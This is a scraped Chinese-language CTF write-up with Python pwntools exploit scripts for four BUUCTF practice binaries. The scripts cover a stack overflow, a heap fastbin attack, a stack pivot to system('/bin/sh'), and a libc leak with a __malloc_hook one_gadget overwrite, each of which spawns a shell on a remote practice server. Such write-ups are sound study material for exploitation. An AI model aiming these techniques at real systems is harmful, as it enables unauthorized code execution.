PWN-PRACTICE-BUUCTF-16
生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-BUUCTF-16
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
PWN-PRACTICE-BUUCTF-16
- mrctf2020_easyoverflow
- hitcontraining_magicheap
- ciscn_2019_s_4
- 0ctf_2017_babyheap
mrctf2020_easyoverflow
覆蓋main函數中的v5,使之為"n0t_r3@11y_f1@g"
from pwn import * r=remote("node4.buuoj.cn",29521) payload='a'*0x30+"n0t_r3@11y_f1@g" r.sendline(payload) r.interactive()hitcontraining_magicheap
參考:picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
from pwn import * io=remote("node4.buuoj.cn",27011) #io=process("./magicheap") elf=ELF("./magicheap")def create(size,content):io.sendlineafter("choice :","1")io.sendlineafter("Size of Heap : ",str(size))io.sendlineafter("Content of heap:",content) def edit(index,size,content):io.sendlineafter("choice :","2")io.sendlineafter("Index :",str(index))io.sendlineafter("Size of Heap : ",str(size))io.sendlineafter("Content of heap : ",content) def delete(index):io.sendlineafter("choice :","3")io.sendlineafter("Index :",str(index)) def getshell():io.sendlineafter("choice :","4869")heaparray=0x00000000006020C0 fake_chunk_prev_size=heaparray-0x38+5#gdb.attach(io) #pause()create(0x10,"a"*8)#chunk0 create(0x10,"b"*8)#chunk1 create(0x60,"c"*8)#chunk2#pause()delete(2)#pause()payload="b"*0x10+p64(0)+p64(0x71)+p64(fake_chunk_prev_size) edit(1,len(payload),payload)#pause()create(0x60,"c"*8)#chunk2 create(0x60,"d"*8)#fake_chunk#pause()payload="d"*3+p64(0x1305+1) edit(2,len(payload),payload)getshell()io.interactive()ciscn_2019_s_4
泄露棧地址,然后棧遷移
from pwn import * context.log_level="debug" #io=process('./ciscn_s_4') io=remote('node4.buuoj.cn',28112) elf=ELF('./ciscn_s_4')input_stk_offset=0x50 leave_ret=0x080484b8 system=0x08048559#gdb.attach(io,"break * 0x080485CD")io.recvuntil('your name?\n') payload='a'*(40-4)+'b'*4 io.send(payload) io.recvuntil('bbbb') io.recv(12) stk=u32(io.recv(4)) input_stk=stk-input_stk_offset io.recvuntil('\n') payload='a'*4+p32(system)+p32(input_stk+12)+'/bin/sh\x00' payload=payload.ljust(0x28,'\x00') payload+=p32(input_stk) payload+=p32(leave_ret) io.send(payload) io.interactive()0ctf_2017_babyheap
參考:0ctf_2017_babyheap
from pwn import * context.log_level="debug" io=remote("node4.buuoj.cn",28235) #io=process("./0ctf_2017_babyheap") elf=ELF("./0ctf_2017_babyheap") libc=ELF("./libc-2.23-16-x64.so") def alloc(size):io.sendlineafter("Command: ","1")io.sendlineafter("Size: ",str(size)) def fill(index,size,content):io.sendlineafter("Command: ","2")io.sendlineafter("Index: ",str(index))io.sendlineafter("Size: ",str(size))io.sendlineafter("Content: ",content) def free(index):io.sendlineafter("Command: ","3")io.sendlineafter("Index: ",str(index)) def dump(index):io.sendlineafter("Command: ","4")io.sendlineafter("Index: ",str(index))#gdb.attach(io) #pause()alloc(0x10)#0 alloc(0x10)#1 alloc(0x80)#2 alloc(0x20)#3 alloc(0x60)#4 alloc(0x10)#5#pause()payload="a"*0x18+p64(0xb1) fill(0,len(payload),payload) free(1) alloc(0xa0)#1 calloc payload="b"*0x10+p64(0)+p64(0x91) fill(1,len(payload),payload) free(2) dump(1) libc_base = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00')) -0x3c4b78 print(hex(libc_base)) malloc_hook=libc_base+libc.sym["__malloc_hook"] print(hex(malloc_hook))#pause()free(4) payload="c"*0x20+p64(0)+p64(0x71)+p64(malloc_hook-0x23) fill(3,len(payload),payload) alloc(0x60)#2 alloc(0x60)#4 fake chunk one_gadget=libc_base+0x4526a payload="\x00"*0x13+p64(one_gadget) fill(4,len(payload),payload)#pause()alloc(1)io.interactive()總結
以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-16的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 2017年招商银行微信申请信用卡秒批方法
- 下一篇: 招行现金分期还款日是哪一天 招行现金分期